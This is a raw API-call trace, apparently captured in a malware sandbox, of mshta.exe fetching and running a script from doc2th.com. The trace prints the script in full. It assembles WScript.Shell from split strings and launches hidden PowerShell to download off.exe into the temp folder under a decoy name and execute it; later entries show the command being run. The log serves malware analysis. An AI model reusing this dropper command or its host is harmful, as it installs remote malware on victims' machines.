riid=0x632a95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x40f3c4 | out: ppvObject=0x40f3c4*=0x1b31268) returned 0x0 [0046.735] IUnknown:Release (This=0x1b31268) returned 0x1 [0046.735] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.735] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", pdwZone=0x40f334, dwFlags=0x0 | out: pdwZone=0x40f334*=0xffffffff) returned 0x800c0011 [0046.735] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.735] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0046.735] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0046.735] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="http://doc2th.com/tin/foobaz.txt", dwAction=0x1401, pPolicy=0x40f338, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x40f338*=0x0) returned 0x0 [0046.735] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.736] GetCurrentThreadId () returned 0xa1c [0046.736] GetCurrentThreadId () returned 0xa1c [0046.736] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x40f260 | out: phkResult=0x40f260*=0x440) returned 0x0 [0046.737] GetProcAddress (hModule=0x754d0000, lpProcName="RegQueryValueExA") returned 0x754e48ef [0046.737] RegQueryValueExA (in: hKey=0x440, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x40f254, lpData=0x40f258, lpcbData=0x40f25c*=0x4 | out: lpType=0x40f254*=0x4, lpData=0x40f258*=0x1, lpcbData=0x40f25c*=0x4) returned 0x0 [0046.737] GetProcAddress (hModule=0x754d0000, lpProcName="RegCloseKey") returned 0x754e469d [0046.737] RegCloseKey (hKey=0x440) returned 0x0 [0046.737] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x766f0000 [0046.737] GetProcAddress (hModule=0x766f0000, lpProcName="CoGetObjectContext") returned 0x7673632b [0046.737] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x766f0000 [0046.737] GetProcAddress (hModule=0x766f0000, lpProcName="CoCreateInstance") returned 0x76739d0b [0046.737] CoCreateInstance (in: rclsid=0x6e8d23a8*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6e8d23b8*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f25c | out: ppv=0x40f25c*=0x76836460) returned 0x0 [0046.737] ??_U@YAPAXI@Z () returned 0x591290 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x40f200, nSize=0x27 | out: lpBuffer="") returned 0x0 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0046.738] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x40f270, cchData=6 | out: lpLCData="1252") returned 5 [0046.738] IsValidCodePage (CodePage=0x4e4) returned 1 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] CoCreateInstance (in: rclsid=0x6e8d15ec*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6e8d15fc*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x1b31454 | out: ppv=0x1b31454*=0x142738) returned 0x0 [0046.738] IUnknown:AddRef (This=0x142738) returned 0x2 [0046.738] GetCurrentProcessId () returned 0xa18 [0046.738] GetCurrentThreadId () returned 0xa1c [0046.738] GetTickCount () returned 0x1a746 [0046.738] ISystemDebugEventFire:BeginSession (This=0x142738, guidSourceID=0x6e8d16d4, strSessionName="JScript:00002584:00002588:18108358") returned 0x0 [0046.739] GetCurrentThreadId () returned 0xa1c [0046.739] GetCurrentThreadId () returned 0xa1c [0046.739] GetCurrentThreadId () returned 0xa1c [0046.739] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0046.740] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f1cc | out: ppv=0x40f1cc*=0x116278) returned 0x0 [0046.740] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x76836460, pUnk=0x59ffb8, riid=0x6e8d5710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x59ffd4 | out: pdwCookie=0x59ffd4*=0x100) returned 0x0 [0046.740] IUnknown:QueryInterface (in: This=0x59ffb8, riid=0x767297c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40f150 | out: ppvObject=0x40f150*=0x0) returned 0x80004002 [0046.740] IUnknown:QueryInterface (in: This=0x59ffb8, riid=0x76733e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40f140 | out: ppvObject=0x40f140*=0x0) returned 0x80004002 [0046.740] IUnknown:AddRef (This=0x59ffb8) returned 0x2 [0046.740] IUnknown:AddRef (This=0x116278) returned 0x2 [0046.740] IUnknown:Release (This=0x116278) returned 0x1 [0046.740] GetTickCount () returned 0x1a746 [0046.740] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f1e8 | out: ppv=0x40f1e8*=0x116278) returned 0x0 [0046.740] IUnknown:Release (This=0x116278) returned 0x1 [0046.740] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f1e8 | out: ppv=0x40f1e8*=0x116278) returned 0x0 [0046.740] IUnknown:Release (This=0x116278) returned 0x1 [0046.740] GetCurrentThreadId () returned 0xa1c [0046.740] GetProcAddress (hModule=0x75580000, lpProcName=0x2) returned 0x75584642 [0046.741] StrCmpIW (psz1="http://doc2th.com/tin/foobaz.txt", psz2="http://doc2th.com/tin/foobaz.txt") returned 0 [0046.741] GetCurrentThreadId () returned 0xa1c [0046.741] _wcsicmp (_String1="", _String2="") returned 0 [0046.741] SysStringLen (param_1="\r\nl='hell';\r\ne=['WScr'+'ipt.S'+l];\r\na=new ActiveXObject(e);\r\na.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\\'http://doc2th.com/tin/off.exe\\', \\'%TEMP%/lambdoidtegument.exe\\');%TEMP%/lambdoidtegument.exe', 0); \r\nwindow.close();\r\n") returned 0x13c [0046.743] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f308 | out: ppv=0x40f308*=0x116278) returned 0x0 [0046.743] IUnknown:Release (This=0x116278) returned 0x1 [0046.744] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f358 | out: ppv=0x40f358*=0x116278) returned 0x0 [0046.744] IUnknown:Release (This=0x116278) returned 0x1 [0046.744] ISystemDebugEventFire:IsActive (This=0x142738) returned 0x1 [0046.744] CoGetObjectContext (in: riid=0x6e8d0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40f354 | out: ppv=0x40f354*=0x116278) returned 0x0 [0046.744] IUnknown:Release (This=0x116278) returned 0x1 [0046.744] GetCurrentThreadId () returned 0xa1c [0046.744] GetCurrentThreadId () returned 0xa1c [0046.745] GetCurrentThreadId () returned 0xa1c [0046.745] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.745] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x6c) returned 0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x6c) returned 0 [0046.747] GetCurrentThreadId () returned 0xa1c [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x65) returned 0 [0046.747] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.747] IsCharSpaceW (wch=0x65) returned 0 [0046.749] GetCurrentThreadId () returned 0xa1c [0046.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] IsCharSpaceW (wch=0x61) returned 0 [0046.749] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.749] IsCharSpaceW (wch=0x61) returned 0 [0046.752] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x766f0000 [0046.752] GetProcAddress (hModule=0x766f0000, lpProcName="CLSIDFromProgIDEx") returned 0x76700782 [0046.752] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x40ef1c | out: lpclsid=0x40ef1c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0046.754] SysStringLen (param_1=0x0) returned 0x0 [0046.754] GetProcAddress (hModule=0x766f0000, lpProcName="CoGetClassObject") returned 0x767254ad [0046.754] CoGetClassObject (in: rclsid=0x40ef1c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x6e8d087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40ef10 | out: ppv=0x40ef10*=0x1b33a20) returned 0x0 [0047.021] GetVersionExA (in: lpVersionInformation=0x40daf8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x76fa2dd6, dwPlatformId=0x76e4f761, szCSDVersion="°Û@") | out: lpVersionInformation=0x40daf8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0047.021] GetUserDefaultLCID () returned 0x409 [0047.021] DllGetClassObject (in: rclsid=0x11e89c*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x40ebc0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e278 | out: ppv=0x40e278*=0x1b33a20) returned 0x0 [0047.021] WshShell:IUnknown:AddRef (This=0x1b33a20) returned 0x2 [0047.021] WshShell:IUnknown:Release (This=0x1b33a20) returned 0x1 [0047.021] WshShell:IUnknown:QueryInterface (in: This=0x1b33a20, riid=0x6e8d087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40ee3c | out: ppvObject=0x40ee3c*=0x1b33a20) returned 0x0 [0047.021] WshShell:IUnknown:Release (This=0x1b33a20) returned 0x1 [0047.021] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x40ed98, nSize=0x105 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0047.021] lstrlenA (lpString="\\wscript.exe") returned 12 [0047.021] lstrlenA (lpString="C:\\Windows\\system32\\mShta.exe") returned 29 [0047.021] _strcmpi (_Str1="32\\mShta.exe", _Str2="\\wscript.exe") returned -1 [0047.021] _strcmpi (_Str1="32\\mShta.exe", _Str2="\\cscript.exe") returned -1 [0047.021] LoadRegTypeLib (in: rguid=0x71f914bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x40ef3c*=0x0 | out: pptlib=0x40ef3c*=0x16ec00) returned 0x0 [0047.025] ITypeLib:GetTypeInfoOfGuid (in: This=0x16ec00, GUID=0x71f914cc, ppTInfo=0x40ef20 | out: ppTInfo=0x40ef20*=0x17d5dc) returned 0x0 [0047.025] ITypeInfo:GetRefTypeOfImplType (in: This=0x17d5dc, index=0xffffffff, pRefType=0x40ef14 | out: pRefType=0x40ef14*=0xfffffffe) returned 0x0 [0047.025] ITypeInfo:GetRefTypeInfo (in: This=0x17d5dc, hreftype=0xfffffffe, ppTInfo=0x71fa501c | out: ppTInfo=0x71fa501c*=0x17d608) returned 0x0 [0047.025] IUnknown:Release (This=0x17d5dc) returned 0x1 [0047.025] IUnknown:Release (This=0x16ec00) returned 0x1 [0047.026] IUnknown:AddRef (This=0x17d608) returned 0x2 [0047.026] ITypeInfo:LocalGetIDsOfNames (This=0x17d608) returned 0x0 [0047.026] IUnknown:Release (This=0x17d608) returned 0x1 [0047.026] IUnknown:AddRef (This=0x17d608) returned 0x2 [0047.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0047.026] ITypeInfo:LocalInvoke (This=0x17d608) returned 0x0 [0047.026] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', '%TEMP%/lambdoidtegument.exe');%TEMP%/lambdoidtegument.exe", lpDst=0x40e42c, nSize=0x400 | out: lpDst="C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe") returned 0x115 [0047.026] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75810000 [0047.026] GetProcAddress (hModule=0x75810000, lpProcName="ShellExecuteExW") returned 0x75831e46 [0047.026] ShellExecuteExW (in: pExecInfo=0x40ebf8*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe", lpParameters="-windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x40ebf8*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="C:\\Windows/system32/WindowsPowerShell/v1.0/powershell.exe", lpParameters="-windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0047.028] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.028] SetTimer (hWnd=0x10204, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0047.028] GetCurrentThreadId () returned 0xa1c [0047.133] GetWindowLongW (hWnd=0x10204, nIndex=-21) returned 1183792 [0047.133] KillTimer (hWnd=0x10204, uIDEvent=0x1008) returned 1 [0047.133] GetCurrentThreadId () returned 0xa1c [0047.188] IUnknown:Release (This=0x17d608) returned 0x1 [0047.188] GetCurrentThreadId () returned 0xa1c [0047.188] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0047.188] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0047.189] GetCurrentThreadId () returned 0xa1c [0047.189] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0047.252] PostMessageW (hWnd=0x10200, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0047.252] GetCurrentThreadId () returned 0xa1c [0047.252] GetCurrentThreadId () returned 0xa1c [0047.253] ISystemDebugEventFire:IsActive (This=0x142738) returned 0x1 [0047.253] GetCurrentThreadId () returned 0xa1c [0047.253] GetCurrentThreadId () returned 0xa1c [0047.253] GetCurrentThreadId () returned 0xa1c [0047.261] GetSystemDefaultLCID () returned 0x409 [0047.261] GetVersionExW (in: lpVersionInformation=0x40f358*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x1a4390, dwMinorVersion=0x10, dwBuildNumber=0xf0000, dwPlatformId=0x10000, szCSDVersion="탨\x13@斔盺ĸ\x0f数盺퉈睃") | out: lpVersionInformation=0x40f358*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0047.261] GetKeyboardLayoutList (in: nBuff=32, lpList=0x40f2d8 | out: lpList=0x40f2d8) returned 1 [0047.261] GetSystemMetrics (nIndex=4096) returned 0 [0047.261] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0047.261] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b2 [0047.261] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b5 [0047.261] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0047.261] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0047.261] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0047.261] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07c [0047.261] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0047.261] SetTimer (hWnd=0x10204, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0047.262] RedrawWindow (hWnd=0x10204, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0047.262] GetTickCount () returned 0x1a86e [0047.271] IUnknown:Release (This=0x11ae64) returned 0x11 [0047.271] IUnknown:Release (This=0x124868) returned 0x3 [0047.271] IUnknown:Release (This=0x11ae64) returned 0x10 [0047.274] IUnknown:Release (This=0x11ae64) returned 0xf [0047.274] IUnknown:Release (This=0x124868) returned 0x2 [0047.274] IUnknown:Release (This=0x11ae64) returned 0xe [0047.274] IUnknown:Release (This=0x11ae64) returned 0xd [0047.274] IUnknown:Release (This=0x11ae64) returned 0xc [0047.275] IUnknown:Release (This=0x11ae64) returned 0xb [0047.275] IUnknown:Release (This=0x14b3e8) returned 0x1 [0047.275] IUnknown:Release (This=0x14b3e8) returned 0x0 [0047.275] IUnknown:Release (This=0x11ae64) returned 0x8 [0047.275] IUnknown:Release (This=0x11ae64) returned 0x7 [0047.275] IUnknown:Release (This=0x11ae64) returned 0x6 [0047.275] LoadStringW (in: hInstance=0x6d270000, uID=0x1fe9, lpBuffer=0x40f368, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0047.277] GetFocus () returned 0x10204 [0047.278] GetFocus () returned 0x10204 [0047.278] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.278] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.278] GetKeyState (nVirtKey=16) returned 0 [0047.278] GetKeyState (nVirtKey=17) returned 0 [0047.278] GetKeyState (nVirtKey=18) returned 0 [0047.278] GetKeyState (nVirtKey=160) returned 0 [0047.278] GetKeyState (nVirtKey=162) returned 0 [0047.278] GetKeyState (nVirtKey=164) returned 0 [0047.278] GetCapture () returned 0x0 [0047.278] GetCurrentThreadId () returned 0xa1c [0047.278] GetCurrentThreadId () returned 0xa1c [0047.278] GetCurrentThreadId () returned 0xa1c [0047.278] GetFocus () returned 0x10204 [0047.278] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.278] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.278] GetKeyState (nVirtKey=16) returned 0 [0047.278] GetKeyState (nVirtKey=17) returned 0 [0047.278] GetKeyState (nVirtKey=18) returned 0 [0047.278] GetKeyState (nVirtKey=160) returned 0 [0047.278] GetKeyState (nVirtKey=162) returned 0 [0047.278] GetKeyState (nVirtKey=164) returned 0 [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.279] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.279] GetKeyState (nVirtKey=16) returned 0 [0047.279] GetKeyState (nVirtKey=17) returned 0 [0047.279] GetKeyState (nVirtKey=18) returned 0 [0047.279] GetKeyState (nVirtKey=160) returned 0 [0047.279] GetKeyState (nVirtKey=162) returned 0 [0047.279] GetKeyState (nVirtKey=164) returned 0 [0047.279] GetCapture () returned 0x0 [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.279] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.279] GetKeyState (nVirtKey=16) returned 0 [0047.279] GetKeyState (nVirtKey=17) returned 0 [0047.279] GetKeyState (nVirtKey=18) returned 0 [0047.279] GetKeyState (nVirtKey=160) returned 0 [0047.279] GetKeyState (nVirtKey=162) returned 0 [0047.279] GetKeyState (nVirtKey=164) returned 0 [0047.279] GetCapture () returned 0x0 [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.279] GetCurrentThreadId () returned 0xa1c [0047.280] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.280] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.280] GetKeyState (nVirtKey=16) returned 0 [0047.280] GetKeyState (nVirtKey=17) returned 0 [0047.280] GetKeyState (nVirtKey=18) returned 0 [0047.280] GetKeyState (nVirtKey=160) returned 0 [0047.280] GetKeyState (nVirtKey=162) returned 0 [0047.280] GetKeyState (nVirtKey=164) returned 0 [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCursorPos (in: lpPoint=0x40eec8 | out: lpPoint=0x40eec8*(x=791, y=282)) returned 1 [0047.280] ScreenToClient (in: hWnd=0x10204, lpPoint=0x40eec8 | out: lpPoint=0x40eec8) returned 1 [0047.280] GetKeyState (nVirtKey=16) returned 0 [0047.280] GetKeyState (nVirtKey=17) returned 0 [0047.280] GetKeyState (nVirtKey=18) returned 0 [0047.280] GetKeyState (nVirtKey=160) returned 0 [0047.280] GetKeyState (nVirtKey=162) returned 0 [0047.280] GetKeyState (nVirtKey=164) returned 0 [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetCurrentThreadId () returned 0xa1c [0047.280] GetFocus () returned 0x10204 [0047.280] GetFocus () returned 0x10204 [0047.280] IUnknown:AddRef (This=0x11ae64) returned 0x7 [0047.281] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40e7f4 | out: pdwScheme=0x40e7f4*=0x2) returned 0x0 [0047.281] IUri:GetDisplayUri (in: This=0x11ae64, pbstrDisplayString=0x40e800 | out: pbstrDisplayString=0x40e800*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0047.281] GetWindowTextW (in: hWnd=0x10200, lpString=0x40e3a0, nMaxCount=512 | out: lpString="http://doc2th.com/tin/foobaz.txt") returned 32 [0047.281] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x200, lParam=0x40e3a0) returned 0x20 [0047.281] IUnknown:Release (This=0x11ae64) returned 0x6 [0047.281] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0047.281] SendMessageW (hWnd=0x101fc, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0047.281] DefWindowProcW (hWnd=0x101fc, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0047.281] DefWindowProcW (hWnd=0x101fc, Msg=0xd, wParam=0x104, lParam=0x22c6a0) returned 0x0 [0047.282] DefWindowProcW (hWnd=0x101fc, Msg=0xd, wParam=0x104, lParam=0x22c6a0) returned 0x0 [0047.282] SendMessageW (hWnd=0x10200, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0047.282] DefWindowProcW (hWnd=0x10200, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0047.282] SetWindowLongW (hWnd=0x10200, nIndex=-16, dwNewLong=-2100363264) returned -2033254400 [0047.282] DefWindowProcW (hWnd=0x10200, Msg=0x7c, wParam=0xfffffff0, lParam=0x40f1e4) returned 0x0 [0047.282] DefWindowProcW (hWnd=0x10200, Msg=0x7d, wParam=0xfffffff0, lParam=0x40f1e4) returned 0x0 [0047.291] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10027 [0047.292] SetWindowLongW (hWnd=0x10200, nIndex=-20, dwNewLong=262144) returned 262400 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x7c, wParam=0xffffffec, lParam=0x40f1e4) returned 0x0 [0047.292] DefWindowProcW (hWnd=0x10200, Msg=0x7d, wParam=0xffffffec, lParam=0x40f1e4) returned 0x0 [0047.292] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0xfffffffe, 